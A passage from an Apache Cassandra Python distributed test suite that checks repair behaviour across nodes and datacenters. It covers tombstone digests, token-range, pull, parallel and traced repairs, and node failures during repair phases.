cf in ['cf1', 'cf2']: # insert some data for i in range(0, 10): for j in range(0, 1000): query = SimpleStatement("INSERT INTO {} (key, c1, c2) VALUES ('k{}', 'v{}', 'value')".format(cf, i, j), consistency_level=ConsistencyLevel.ONE) session.execute(query) node1.flush() # delete those data, half with row tombstone, and the rest with cell range tombstones for i in range(0, 5): query = SimpleStatement("DELETE FROM {} WHERE key='k{}'".format(cf, i), consistency_level=ConsistencyLevel.ONE) session.execute(query) node1.flush() for i in range(5, 10): for j in range(0, 1000): query = SimpleStatement("DELETE FROM {} WHERE key='k{}' AND c1='v{}'".format(cf, i, j), consistency_level=ConsistencyLevel.ONE) session.execute(query) node1.flush() # sleep until gc grace seconds pass so that cf1 can be dropped time.sleep(2) # bring up node2 and repair node2.start(wait_for_binary_proto=True) node2.repair(_repair_options(self.cluster.version(), ks='ks', sequential=sequential)) # check no rows will be returned for cf in ['cf1', 'cf2']: for i in range(0, 10): query = SimpleStatement("SELECT c1, c2 FROM {} WHERE key='k{}'".format(cf, i), consistency_level=ConsistencyLevel.ALL) res = list(session.execute(query)) assert len([x for x in res if len(x) != 0]) == 0, res # check log for no repair happened for gcable data out_of_sync_logs = node2.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync for cf1".format(cluster.address_regex(), cluster.address_regex())) assert len(out_of_sync_logs) == 0, "GC-able data does not need to be repaired with empty data: " + str([elt[0] for elt in out_of_sync_logs]) # check log for actual repair for non gcable data out_of_sync_logs = node2.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync for cf2".format(cluster.address_regex(), cluster.address_regex())) assert len(out_of_sync_logs) > 0, "Non GC-able data should be repaired" def _range_tombstone_digest(self, sequential): """ multiple range tombstones for same partition and interval must not create a digest mismatch as long as the most recent tombstone is present. @jira_ticket cassandra-11349. """ def withsession(session, node1): session.execute("delete from table1 where c1 = 'a' and c2 = 'b'") node1.flush() # recreate same tombstone (will be flushed by repair, so we end up with 2x on node1 and 1x on node2) session.execute("delete from table1 where c1 = 'a' and c2 = 'b'") self._repair_digest(sequential, withsession) def _cell_shadowed_by_range_tombstone(self, sequential): """ Cells shadowed by range tombstones must not effect repairs (given tombstones are present on all nodes) @jira_ticket CASSANDRA-11349. """ def withSession(session, node1): session.execute("INSERT INTO table1 (c1, c2, c3, c4) VALUES ('a', 'b', 'c', 1)") node1.flush() session.execute("DELETE FROM table1 WHERE c1 = 'a' AND c2 = 'b'") self._repair_digest(sequential, withSession) def _range_tombstone_shadowed_by_range_tombstone(self, sequential): """ Range tombstones shadowed by other range tombstones must not effect repairs @jira_ticket CASSANDRA-11349. """ def withSession(session, node1): session.execute("DELETE FROM table1 WHERE c1 = 'a' AND c2 = 'b' AND c3 = 'c'") node1.flush() session.execute("DELETE FROM table1 WHERE c1 = 'a' AND c2 = 'b'") node1.flush() session.execute("DELETE FROM table1 WHERE c1 = 'a' AND c2 = 'b' AND c3 = 'd'") node1.flush() session.execute("DELETE FROM table1 WHERE c1 = 'a' AND c2 = 'b' AND c3 = 'a'") self._repair_digest(sequential, withSession) def _repair_digest(self, sequential, populate): cluster = self.cluster cluster.populate(2) cluster.set_configuration_options(values={'hinted_handoff_enabled': False}) cluster.set_batch_commitlog(enabled=True) cluster.start() node1, node2 = cluster.nodelist() session = self.patient_cql_connection(node1) # create keyspace with RF=2 to be able to be repaired create_ks(session, 'ks', 2) query = """ CREATE TABLE IF NOT EXISTS table1 ( c1 text, c2 text, c3 text, c4 float, PRIMARY KEY (c1, c2, c3) ) WITH compaction = {'class': 'SizeTieredCompactionStrategy', 'enabled': 'false'}; """ session.execute(query) populate(session, node1) node2.repair(_repair_options(self.cluster.version(), ks='ks', sequential=sequential)) # check log for no repair happened for gcable data out_of_sync_logs = node2.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync for table1".format(cluster.address_regex(), cluster.address_regex())) assert len(out_of_sync_logs) == 0, "Digest mismatch for range tombstone: {}".format(str([elt[0] for elt in out_of_sync_logs])) def test_local_dc_repair(self): """ * Set up a multi DC cluster * Perform a -local repair on one DC * Assert only nodes in that DC are repaired """ cluster = self._setup_multi_dc() node1 = cluster.nodes["node1"] node2 = cluster.nodes["node2"] logger.debug("starting repair...") opts = ["-local"] opts += _repair_options(self.cluster.version(), ks="ks") node1.repair(opts) # Verify that only nodes in dc1 are involved in repair out_of_sync_logs = node1.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync".format(cluster.address_regex(), cluster.address_regex())) assert len(out_of_sync_logs) == 1, "Lines matching: {}".format(len(out_of_sync_logs)) line, m = out_of_sync_logs[0] num_out_of_sync_ranges, out_of_sync_nodes = m.group(3), {m.group(1), m.group(2)} assert int(num_out_of_sync_ranges) == 1, "Expecting 1 range out of sync for {}, but saw {}".format(out_of_sync_nodes, num_out_of_sync_ranges) valid_out_of_sync_pairs = {node1.address(), node2.address()} assert out_of_sync_nodes == valid_out_of_sync_pairs, "Unrelated node found in local repair: {}, expected {}".format(out_of_sync_nodes, valid_out_of_sync_pairs) # Check node2 now has the key self.check_rows_on_node(node2, 2001, found=[1000], restart=False) def test_dc_repair(self): """ * Set up a multi DC cluster * Perform a -dc repair on two dc's * Assert only nodes on those dcs were repaired """ cluster = self._setup_multi_dc() node1 = cluster.nodes["node1"] node2 = cluster.nodes["node2"] node3 = cluster.nodes["node3"] logger.debug("starting repair...") opts = ["-dc", "dc1", "-dc", "dc2"] opts += _repair_options(self.cluster.version(), ks="ks") node1.repair(opts) # Verify that only nodes in dc1 and dc2 are involved in repair out_of_sync_logs = node1.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync".format(cluster.address_regex(), cluster.address_regex())) assert len(out_of_sync_logs) == 2, "Lines matching: " + str([elt[0] for elt in out_of_sync_logs]) valid_out_of_sync_pairs = [{node1.address(), node2.address()}, {node2.address(), node3.address()}] for line, m in out_of_sync_logs: num_out_of_sync_ranges, out_of_sync_nodes = m.group(3), {m.group(1), m.group(2)} assert int(num_out_of_sync_ranges) == 1, "Expecting 1 range out of sync for {}, but saw {}".format(out_of_sync_nodes, num_out_of_sync_ranges) assert out_of_sync_nodes, valid_out_of_sync_pairs in str(out_of_sync_nodes) # Check node2 now has the key self.check_rows_on_node(node2, 2001, found=[1000], restart=False) def test_dc_parallel_repair(self): """ * Set up a multi DC cluster * Perform a -dc repair on two dc's, with -dcpar * Assert only nodes on those dcs were repaired """ cluster = self._setup_multi_dc() node1 = cluster.nodes["node1"] node2 = cluster.nodes["node2"] node3 = cluster.nodes["node3"] logger.debug("starting repair...") opts = ["-dc", "dc1", "-dc", "dc2", "-dcpar"] opts += _repair_options(self.cluster.version(), ks="ks", sequential=False) node1.repair(opts) # Verify that only nodes in dc1 and dc2 are involved in repair out_of_sync_logs = node1.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync".format(cluster.address_regex(), cluster.address_regex())) assert len(out_of_sync_logs) == 2, "Lines matching: " + str([elt[0] for elt in out_of_sync_logs]) valid_out_of_sync_pairs = [{node1.address(), node2.address()}, {node2.address(), node3.address()}] for line, m in out_of_sync_logs: num_out_of_sync_ranges, out_of_sync_nodes = m.group(3), {m.group(1), m.group(2)} assert int(num_out_of_sync_ranges) == 1, "Expecting 1 range out of sync for {}, but saw {}".format(out_of_sync_nodes, num_out_of_sync_ranges) assert out_of_sync_nodes, valid_out_of_sync_pairs in str(out_of_sync_nodes) # Check node2 now has the key self.check_rows_on_node(node2, 2001, found=[1000], restart=False) # Check the repair was a dc parallel repair if self.cluster.version() >= '2.2': assert len(node1.grep_log('parallelism: dc_parallel')) == 1, str(node1.grep_log('parallelism')) else: assert len(node1.grep_log('parallelism=PARALLEL')) == 1, str(node1.grep_log('parallelism')) def _setup_multi_dc(self): """ Sets up 3 DCs (2 nodes in 'dc1', and one each in 'dc2' and 'dc3'). After set up, node2 in dc1 lacks some data and needs to be repaired. """ cluster = self.cluster # Disable hinted handoff and set batch commit log so this doesn't # interfer with the test (this must be after the populate) cluster.set_configuration_options(values={'hinted_handoff_enabled': False}) cluster.set_batch_commitlog(enabled=True) logger.debug("Starting cluster..") # populate 2 nodes in dc1, and one node each in dc2 and dc3 cluster.populate([2, 1, 1]).start() node1, node2, node3, node4 = cluster.nodelist() session = self.patient_cql_connection(node1) session.execute("CREATE KEYSPACE ks WITH replication = {'class': 'NetworkTopologyStrategy', 'dc1': 2, 'dc2': 1, 'dc3':1}") session.execute("USE ks") if cluster.version() < '4.0': create_cf(session, 'cf', read_repair=0.0, columns={'c1': 'text', 'c2': 'text'}) else: create_cf(session, 'cf', columns={'c1': 'text', 'c2': 'text'}) # Insert 1000 keys, kill node 2, insert 1 key, restart node 2, insert 1000 more keys logger.debug("Inserting data...") insert_c1c2(session, n=1000, consistency=ConsistencyLevel.ALL) node2.flush() node2.stop(wait_other_notice=True) insert_c1c2(session, keys=(1000, ), consistency=ConsistencyLevel.THREE) node2.start(wait_for_binary_proto=True) node1.watch_log_for_alive(node2) insert_c1c2(session, keys=list(range(1001, 2001)), consistency=ConsistencyLevel.ALL) cluster.flush() # Verify that only node2 has only 2000 keys and others have 2001 keys logger.debug("Checking data...") self.check_rows_on_node(node2, 2000, missings=[1000]) for node in [node1, node3, node4]: self.check_rows_on_node(node, 2001, found=[1000]) return cluster @since('2.2') def parallel_table_repair_noleak(self): """ @jira_ticket CASSANDRA-11215 Tests that multiple parallel repairs on the same table isn't causing reference leaks. """ self.fixture_dtest_setup.ignore_log_patterns = [ "Cannot start multiple repair sessions over the same sstables", # The message we are expecting "Validation failed in", # Expecting validation to fail "RMI Runtime", # JMX Repair failures "Session completed with the following error", # The nodetool repair error "ValidationExecutor", # Errors by the validation executor "RepairJobTask" # Errors by the repair job task ] cluster = self.cluster logger.debug("Starting cluster..") cluster.populate([3]).start() node1, node2, node3 = cluster.nodelist() node1.stress(stress_options=['write', 'n=10k', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=3)', '-rate', 'threads=50']) # Start multiple repairs in parallel threads = [] for i in range(3): t = threading.Thread(target=node1.nodetool, args=("repair keyspace1 standard1",)) threads.append(t) t.start() # Wait for the repairs to finish for t in threads: t.join() found_message = False # All nodes should reject multiple repairs and have no reference leaks for node in cluster.nodelist(): if len(node.grep_log("Cannot start multiple repair sessions over the same sstables")) > 0: found_message = True break assert found_message @pytest.mark.no_vnodes def test_token_range_repair(self): """ Test repair using the -st and -et options * Launch a three node cluster * Insert some data at RF 2 * Shut down node2, insert more data, restore node2 * Issue a repair on a range that only belongs to node1 * Verify that nodes 1 and 2, and only nodes 1+2, are repaired """ cluster = self.cluster cluster.set_configuration_options(values={'hinted_handoff_enabled': False}) cluster.set_batch_commitlog(enabled=True) logger.debug("Starting cluster..") cluster.populate(3).start() node1, node2, node3 = cluster.nodelist() self._parameterized_range_repair(repair_opts=['-st', str(node3.initial_token), '-et', str(node1.initial_token)]) @pytest.mark.no_vnodes def test_token_range_repair_with_cf(self): """ @jira_ticket CASSANDRA-11866 Test repair using the -st and -et, and -cf options * Launch a three node cluster * Insert some data at RF 2 * Shut down node2, insert more data, restore node2 * Issue a repair on a range that only belongs to node1 on the wrong cf * Verify that the data did not get repaired * Issue a repair on a range that belongs to the right cf * Verify that the data was repaired """ cluster = self.cluster cluster.set_configuration_options(values={'hinted_handoff_enabled': False}) cluster.set_batch_commitlog(enabled=True) logger.debug("Starting cluster..") cluster.populate(3).start() node1, node2, node3 = cluster.nodelist() # Insert data, kill node 2, insert more data, restart node 2, insert another set of data logger.debug("Inserting data...") node1.stress(['write', 'n=1k', 'no-warmup', 'cl=ALL', '-schema', 'replication(factor=2)', '-rate', 'threads=30']) node2.flush() node2.stop(wait_other_notice=True) node1.stress(['write', 'n=1K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=2)', '-rate', 'threads=30', '-pop', 'seq=20..40K']) node2.start(wait_for_binary_proto=True) node1.stress(['write', 'n=1K', 'no-warmup', 'cl=ALL', '-schema', 'replication(factor=2)', '-rate', 'threads=30', '-pop', 'seq=40..60K']) cluster.flush() # Repair only the range node 1 owns on the wrong CF, assert everything is still broke opts = ['-st', str(node3.initial_token), '-et', str(node1.initial_token), ] opts += _repair_options(self.cluster.version(), ks='keyspace1', cf='counter1', sequential=False) node1.repair(opts) assert len(node1.grep_log('are consistent for standard1')) == 0, "Nodes 1 and 2 should not be consistent." assert len(node3.grep_log('Repair command')) == 0, "Node 3 should not have been involved in the repair." out_of_sync_logs = node1.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync".format(cluster.address_regex(), cluster.address_regex())) assert len(out_of_sync_logs) == 0, "We repaired the wrong CF == so things should still be broke" # Repair only the range node 1 owns on the right CF, assert everything is fixed opts = ['-st', str(node3.initial_token), '-et', str(node1.initial_token), ] opts += _repair_options(self.cluster.version(), ks='keyspace1', cf='standard1', sequential=False) node1.repair(opts) assert len(node1.grep_log('are consistent for standard1')) == 0, "Nodes 1 and 2 should not be consistent." assert len(node3.grep_log('Repair command')) == 0, "Node 3 should not have been involved in the repair." out_of_sync_logs = node1.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync".format(cluster.address_regex(), cluster.address_regex())) _, matches = out_of_sync_logs[0] out_of_sync_nodes = {matches.group(1), matches.group(2)} valid_out_of_sync_pairs = [{node1.address(), node2.address()}] assert out_of_sync_nodes, valid_out_of_sync_pairs in str(out_of_sync_nodes) @pytest.mark.no_vnodes def test_partitioner_range_repair(self): """ Test repair using the -pr option * Launch a three node cluster * Insert some data at RF 2 * Shut down node2, insert more data, restore node2 * Issue a repair on a range that only belongs to node1 * Verify that nodes 1 and 2, and only nodes 1+2, are repaired """ cluster = self.cluster cluster.set_configuration_options(values={'hinted_handoff_enabled': False}) cluster.set_batch_commitlog(enabled=True) logger.debug("Starting cluster..") cluster.populate(3).start() node1, node2, node3 = cluster.nodelist() self._parameterized_range_repair(repair_opts=['-pr']) @since('3.10') @pytest.mark.no_vnodes def test_pull_repair(self): """ Test repair using the --pull option @jira_ticket CASSANDRA-9876 * Launch a three node cluster * Insert some data at RF 2 * Shut down node2, insert more data, restore node2 * Issue a pull repair on a range that only belongs to node1 * Verify that nodes 1 and 2, and only nodes 1+2, are repaired * Verify that node1 only received data * Verify that node2 only sent data """ cluster = self.cluster cluster.set_configuration_options(values={'hinted_handoff_enabled': False}) cluster.set_batch_commitlog(enabled=True) logger.debug("Starting cluster..") cluster.populate(3).start() node1, node2, node3 = cluster.nodelist() node1_address = node1.network_interfaces['binary'][0] node2_address = node2.network_interfaces['binary'][0] self._parameterized_range_repair(repair_opts=['--pull', '--in-hosts', node1_address + ',' + node2_address, '-st', str(node3.initial_token), '-et', str(node1.initial_token)]) # Node 1 should only receive files (as we ran a pull repair on node1) assert len(node1.grep_log("Receiving [1-9][0-9]* files")) > 0 assert len(node1.grep_log("sending [1-9][0-9]* files")) == 0 assert len(node1.grep_log("sending 0 files")) > 0 # Node 2 should only send files (as we ran a pull repair on node1) assert len(node2.grep_log("Receiving [1-9][0-9]* files")) == 0 assert len(node2.grep_log("Receiving 0 files")) > 0 assert len(node2.grep_log("sending [1-9][0-9]* files")) > 0 @since('4.0') def test_non_replicated_ks_repair(self): cluster = self.cluster cluster.populate([2, 2]).start(wait_for_binary_proto=True) self.fixture_dtest_setup.ignore_log_patterns.extend(["no neighbors to repair with", "keyspace is skipped since repair was called with --skip-empty"]) _, _, node, _ = cluster.nodelist() session = self.patient_cql_connection(node) create_ks(session, "repair1", {'dc1': 2, 'dc2': 0}) create_ks(session, "repair2", {'dc1': 2, 'dc2': 2}) session.execute("create table repair1.t1 (id int primary key, i int)") session.cluster.control_connection.wait_for_schema_agreement(wait_time=120) session.execute("create table repair2.t2 (id int primary key, i int)") session.cluster.control_connection.wait_for_schema_agreement(wait_time=120) session.execute("insert into repair1.t1 (id, i) values (1, 1)") session.execute("insert into repair2.t2 (id, i) values (2, 2)") node.nodetool("repair --ignore-unreplicated-keyspaces -st 0 -et 1") assert len(node.grep_log("t2 is fully synced")) > 0 assert len(node.grep_log("in repair1 - unreplicated keyspace is ignored since repair was called with --ignore-unreplicated-keyspaces")) > 0 try: self.fixture_dtest_setup.ignore_log_patterns.append("Nothing to repair for .+ in repair1") node.nodetool("repair -st 0 -et 1") assert False, "repair should fail" except ToolError: logger.debug("got expected exception during repair") @since('4.0') @pytest.mark.no_vnodes def test_multiple_ranges_repair(self): cluster = self.cluster cluster.populate([3]) node1, node2, node3 = cluster.nodelist() cluster.start(wait_for_binary_proto=True) self.fixture_dtest_setup.ignore_log_patterns.extend(["Nothing to repair for"]) session = self.patient_cql_connection(node1) create_ks(session, "repair1", {'dc1': 2}) session.execute("create table repair1.t1 (id int primary key, i int)") session.cluster.control_connection.wait_for_schema_agreement(wait_time=120) session.execute("insert into repair1.t1 (id, i) values (1, 1)") with JolokiaAgent(node1) as jmx: repair_mbean = make_mbean('db', 'StorageService') # 0,1 is replicated, -3074457345618258606:-3074457345618258605 is not: jmx.execute_method(repair_mbean, 'repairAsync(java.lang.String,java.util.Map)', ["repair1", {"ranges": "0:1,-3074457345618258606:-3074457345618258605"}]) node1.watch_log_for("Nothing to repair for \(-3074457345618258606,-3074457345618258605\] in repair1 - aborting") assert len(node1.grep_log("fully synced")) == 0 jmx.execute_method(repair_mbean, 'repairAsync(java.lang.String,java.util.Map)', ["repair1", {"ranges": "0:1,-3074457345618258606:-3074457345618258605", "ignoreUnreplicatedKeyspaces": "true"}]) node1.watch_log_for("Found no neighbors for range \(-3074457345618258606,-3074457345618258605\] for repair1 - ignoring since repairing with --ignore-unreplicated-keyspaces") node1.watch_log_for("t1 is fully synced") def _parameterized_range_repair(self, repair_opts): """ @param repair_opts A list of strings which represent cli args to nodetool repair * Launch a three node cluster * Insert some data at RF 2 * Shut down node2, insert more data, restore node2 * Issue a repair on a range that only belongs to node1, using repair_opts * Verify that nodes 1 and 2, and only nodes 1+2, are repaired """ cluster = self.cluster node1, node2, node3 = cluster.nodelist() # Insert data, kill node 2, insert more data, restart node 2, insert another set of data logger.debug("Inserting data...") node1.stress(['write', 'n=20K', 'no-warmup', 'cl=ALL', '-schema', 'replication(factor=2)', '-rate', 'threads=30']) node2.flush() node2.stop(wait_other_notice=True) node1.stress(['write', 'n=20K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=2)', '-rate', 'threads=30', '-pop', 'seq=20..40K']) node2.start(wait_for_binary_proto=True) node1.stress(['write', 'n=20K', 'no-warmup', 'cl=ALL', '-schema', 'replication(factor=2)', '-rate', 'threads=30', '-pop', 'seq=40..60K']) cluster.flush() # Repair only the range node 1 owns opts = repair_opts opts += _repair_options(self.cluster.version(), ks='keyspace1', cf='standard1', sequential=False) node1.repair(opts) assert len(node1.grep_log('are consistent for standard1')) == 0, "Nodes 1 and 2 should not be consistent." assert len(node3.grep_log('Repair command')) == 0, "Node 3 should not have been involved in the repair." out_of_sync_logs = node1.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync".format(cluster.address_regex(), cluster.address_regex())) _, matches = out_of_sync_logs[0] out_of_sync_nodes = {matches.group(1), matches.group(2)} valid_out_of_sync_pairs = [{node1.address(), node2.address()}] assert out_of_sync_nodes, valid_out_of_sync_pairs in str(out_of_sync_nodes) @since('2.2') def test_trace_repair(self): """ * Launch a three node cluster * Insert some data at RF 2 * Shut down node2, insert more data, restore node2 * Issue a repair on to node1, setting job threads to 2 and with tracing enabled * Check the trace data was written, and that the right job thread count was used """ cluster = self.cluster cluster.set_configuration_options(values={'hinted_handoff_enabled': False}) cluster.set_batch_commitlog(enabled=True) logger.debug("Starting cluster..") cluster.populate(3).start() node1, node2, node3 = cluster.nodelist() logger.debug("Inserting data...") node1.stress(['write', 'n=20K', 'no-warmup', 'cl=ALL', '-schema', 'replication(factor=2)', '-rate', 'threads=30']) node2.flush() node2.stop(wait_other_notice=True) node1.stress(['write', 'n=20K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=2)', '-rate', 'threads=30', '-pop', 'seq=20..40K']) node2.start(wait_for_binary_proto=True) cluster.flush() job_thread_count = '2' opts = ['-tr', '-j', job_thread_count] opts += _repair_options(self.cluster.version(), ks='keyspace1', cf='standard1', sequential=False) node1.repair(opts) time.sleep(5) # Give the trace table some time to populate session = self.patient_cql_connection(node1) rows = list(session.execute("SELECT activity FROM system_traces.events")) # This check assumes that the only (or at least first) thing to write to `system_traces.events.activity` is # the repair task triggered in the test. assert 'job threads: {}'.format(job_thread_count) in rows[0][0], \ 'Expected {} job threads in repair options. Instead we saw {}'.format(job_thread_count, rows[0][0]) @since('2.2') def test_thread_count_repair(self): """ * Launch a three node cluster * Insert some data at RF 2 * Shut down node2, insert more data, restore node2 * Issue a repair on to node1, setting job threads * Check the right job thread count was used * Repeat steps 2 through 5 with all job count options """ cluster = self.cluster cluster.set_configuration_options(values={'hinted_handoff_enabled': False}) cluster.set_batch_commitlog(enabled=True) logger.debug("Starting cluster..") cluster.populate(3).start() node1, node2, node3 = cluster.nodelist() # Valid job thread counts: 1, 2, 3, and 4 for job_thread_count in range(1, 5): logger.debug("Inserting data...") node1.stress(['write', 'n=2K', 'no-warmup', 'cl=ALL', '-schema', 'replication(factor=2)', '-rate', 'threads=30', '-pop', 'seq={}..{}K'.format(2 * (job_thread_count - 1), 2 * job_thread_count)]) node2.flush() node2.stop(wait_other_notice=True) node1.stress(['write', 'n=2K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=2)', '-rate', 'threads=30', '-pop', 'seq={}..{}K'.format(2 * (job_thread_count), 2 * (job_thread_count + 1))]) node2.start(wait_for_binary_proto=True) cluster.flush() session = self.patient_cql_connection(node1) session.execute("TRUNCATE system_traces.events") opts = ['-tr', '-j', str(job_thread_count)] opts += _repair_options(self.cluster.version(), ks='keyspace1', cf='standard1', sequential=False) node1.repair(opts) time.sleep(5) # Give the trace table some time to populate rows = list(session.execute("SELECT activity FROM system_traces.events")) # This check assumes that the only (or at least first) thing to write to `system_traces.events.activity` is # the repair task triggered in the test. assert 'job threads: {}'.format(job_thread_count) in rows[0][0], \ 'Expected {} job threads in repair options. Instead we saw {}'.format(job_thread_count, rows[0][0]) @pytest.mark.no_vnodes def test_multiple_concurrent_repairs(self): """ @jira_ticket CASSANDRA-11451 Make sure we can run sub range repairs in parallel - and verify that we actually do repair """ cluster = self.cluster cluster.set_configuration_options(values={'hinted_handoff_enabled': False}) cluster.populate(3).start() node1, node2, node3 = cluster.nodelist() node2.stop(wait_other_notice=True) node1.stress(['write', 'n=1M', 'no-warmup', '-schema', 'replication(factor=3)', '-rate', 'threads=30']) node2.start(wait_for_binary_proto=True) t1 = threading.Thread(target=node1.nodetool, args=('repair keyspace1 standard1 -full -st {} -et {}'.format(str(node3.initial_token), str(node1.initial_token)),)) t2 = threading.Thread(target=node2.nodetool, args=('repair keyspace1 standard1 -full -st {} -et {}'.format(str(node1.initial_token), str(node2.initial_token)),)) t3 = threading.Thread(target=node3.nodetool, args=('repair keyspace1 standard1 -full -st {} -et {}'.format(str(node2.initial_token), str(node3.initial_token)),)) t1.start() t2.start() t3.start() t1.join() t2.join() t3.join() node1.stop(wait_other_notice=True) node3.stop(wait_other_notice=True) _, _, rc = node2.stress(['read', 'n=1M', 'no-warmup', '-rate', 'threads=30'], whitelist=True) assert rc == 0 @since('4.0') def test_wide_row_repair(self): """ @jira_ticket CASSANDRA-13899 Make sure compressed vs uncompressed blocks are handled correctly when stream decompressing """ cluster = self.cluster cluster.set_configuration_options(values={'hinted_handoff_enabled': False}) cluster.populate(2).start() node1, node2 = cluster.nodelist() node2.stop(wait_other_notice=True) profile_path = os.path.join(os.getcwd(), 'stress_profiles/repair_wide_rows.yaml') logger.info(("yaml = " + profile_path)) node1.stress(['user', 'profile=' + profile_path, 'n=50', 'ops(insert=1)', 'no-warmup', '-rate', 'threads=8', '-insert', 'visits=FIXED(100K)', 'revisit=FIXED(100K)']) node2.start(wait_for_binary_proto=True) node2.repair() @since('2.1', max_version='4') def test_dead_coordinator(self): """ @jira_ticket CASSANDRA-11824 Make sure parent repair session is cleared out if the repair coordinator dies """ cluster = self.cluster cluster.set_configuration_options(values={'hinted_handoff_enabled': False}) cluster.populate(3).start() node1, node2, node3 = cluster.nodelist() node1.stress(['write', 'n=100k', '-schema', 'replication(factor=3)', '-rate', 'threads=30']) def run_repair(): try: if cluster.version() >= "2.2": node1.repair() else: node1.nodetool('repair keyspace1 standard1 -inc -par') except ToolError: logger.debug("got expected exception during repair, ignoring") t1 = threading.Thread(target=run_repair) t1.start() if cluster.version() > "2.2": node2.watch_log_for('Validating ValidationRequest', filename='debug.log') else: node1.watch_log_for('requesting merkle trees', filename='system.log') time.sleep(2) logger.debug("stopping node1") node1.stop(gently=False, wait_other_notice=True) t1.join() logger.debug("starting node1 - first repair should have failed") node1.start(wait_for_binary_proto=True) logger.debug("running second repair") if cluster.version() >= "2.2": node1.repair() else: node1.nodetool('repair keyspace1 standard1 -inc -par') @since('2.2') def test_dead_sync_initiator(self): """ @jira_ticket CASSANDRA-12901 """ self._test_failure_during_repair(phase='sync', initiator=True) @since('2.2') def test_dead_sync_participant(self): """ @jira_ticket CASSANDRA-12901 """ self._test_failure_during_repair(phase='sync', initiator=False,) @since('2.2', max_version='4') def test_failure_during_anticompaction(self): """ @jira_ticket CASSANDRA-12901 """ self._test_failure_during_repair(phase='anticompaction',) @since('2.2') def test_failure_during_validation(self): """ @jira_ticket CASSANDRA-12901 """ self._test_failure_during_repair(phase='validation') def _test_failure_during_repair(self, phase, initiator=False): cluster = self.cluster # We are not interested in specific errors, but # that the repair session finishes on node failure without hanging self.fixture_dtest_setup.ignore_log_patterns = [ "Endpoint .* died", "Streaming error occurred", "StreamReceiveTask", "Stream failed", "Session completed with the following error", "Repair session .* for range .* failed with error", "Sync failed between .* and .*", "failed to send a stream message/file to peer", "failed to send a stream message/data to peer" ] # stream session will be closed upon EOF, see CASSANDRA-15666 if cluster.version() >= '4.0': self.ignore_log_patterns.append("Socket closed before session completion") self.ignore_log_patterns.append("is finished with state FAILED") self.ignore_log_patterns.append("stream has been closed") self.ignore_log_patterns.append("stream operation from .* failed") # Disable hinted handoff and set batch commit log so this doesn't # interfere with the test (this must be after the populate) cluster.set_configuration_options(values={'hinted_handoff_enabled': False}) cluster.set_batch_commitlog(enabled=True) logger.debug("Setting up cluster..") cluster.populate(3) node1, node2, node3 = cluster.nodelist() node_to_kill = node2 if (phase == 'sync' and initiator) else node3 logger.debug("Setting up byteman on {}".format(node_to_kill.name)) # set up byteman node_to_kill.byteman_port = '8100' node_to_kill.import_config_files() logger.debug("Starting cluster..") cluster.start(jvm_args=['-Djdk.attach.allowAttachSelf=true']) # cluster.start() logger.debug("stopping node3") node3.stop(gently=False, wait_other_notice=True) self.patient_exclusive_cql_connection(node1) logger.debug("inserting data while node3 is down") node1.stress(stress_options=['write', 'n=1k', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=3)', '-rate', 'threads=10']) logger.debug("bring back node3") node3.start(wait_for_binary_proto=True) if phase == 'sync': script = 'stream_sleep.btm' else: script = 'repair_{}_sleep.btm'.format(phase) if phase == 'validation': prefix = '4.0' if cluster.version() >= '4.0' else 'pre4.0' script = prefix + '/' + script logger.debug("Submitting byteman script to {}".format(node_to_kill.name)) # Sleep on anticompaction/stream so there will be time for node to be killed node_to_kill.byteman_submit(['./byteman/{}'.format(script)]) def node1_repair(): global nodetool_error try: node1.nodetool('repair keyspace1 standard1') except Exception as e: nodetool_error = e logger.debug("repair node1") # Launch in a external thread so it does not hang process t = Thread(target=node1_repair) t.start() logger.debug("Will kill {} in middle of {}".format(node_to_kill.name, phase)) msg_to_wait = 'streaming plan for Repair' if phase == 'anticompaction': msg_to_wait = 'Got anticompaction request' elif phase == 'validation': msg_to_wait = 'Validating' node_to_kill.watch_log_for(msg_to_wait, filename='debug.log') node_to_kill.stop(gently=False, wait_other_notice=True) logger.debug("Killed {}, now waiting repair to finish".format(node_to_kill.name)) t.join(timeout=60) assert not t.is_alive(), 'Repair still running after sync {} was killed'\ .format("initiator" if initiator else "participant") if cluster.version() < '4.0' or phase != 'sync': # the log entry we're watching for in the sync task came from the # anti compaction at the end of the repair, which has been removed in 4.0 node1.watch_log_for('Endpoint .* died', timeout=60) node1.watch_log_for('Repair command .* finished', timeout=60) RepairTableContents = namedtuple('RepairTableContents', ['parent_repair_history', 'repair_history']) @since('2.2') @pytest.mark.resource_intensive class TestRepairDataSystemTable(Tester): """ @jira_ticket CASSANDRA-5839 Tests the `system_distributed.parent_repair_history` and `system_distributed.repair_history` tables by writing thousands of records to a cluster, then ensuring these tables are in valid states before and after running repair. """ @pytest.fixture(scope='function', autouse=True) def fixture_set_cluster_settings(self, fixture_dtest_setup): """ Prepares a cluster for tests of the repair history tables by starting a 5-node cluster, then inserting 5000 values with RF=3. """ self.cluster = fixture_dtest_setup.cluster self.cluster.populate(5).start() self.node1 = self.cluster.nodelist()[0] self.session = fixture_dtest_setup.patient_cql_connection(self.node1) self.node1.stress(stress_options=['write', 'n=5K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=3)']) fixture_dtest_setup.cluster.flush() def repair_table_contents(self, node, include_system_keyspaces=True): """ @param node the node to connect to and query @param include_system_keyspaces if truthy, return repair information about all keyspaces. If falsey, filter out keyspaces whose name contains 'system' Return a `RepairTableContents` `namedtuple` containing the rows in `node`'s `system_distributed.parent_repair_history` and `system_distributed.repair_history` tables. If `include_system_keyspaces`, include all results. If not `include_system_keyspaces`, filter out repair information about system keyspaces, or at least keyspaces with 'system' in their names. """ session = self.patient_cql_connection(node) def execute_with_all(stmt): return session.execute(SimpleStatement(stmt, consistency_level=ConsistencyLevel.ALL)) parent_repair_history = execute_with_all('SELECT * FROM 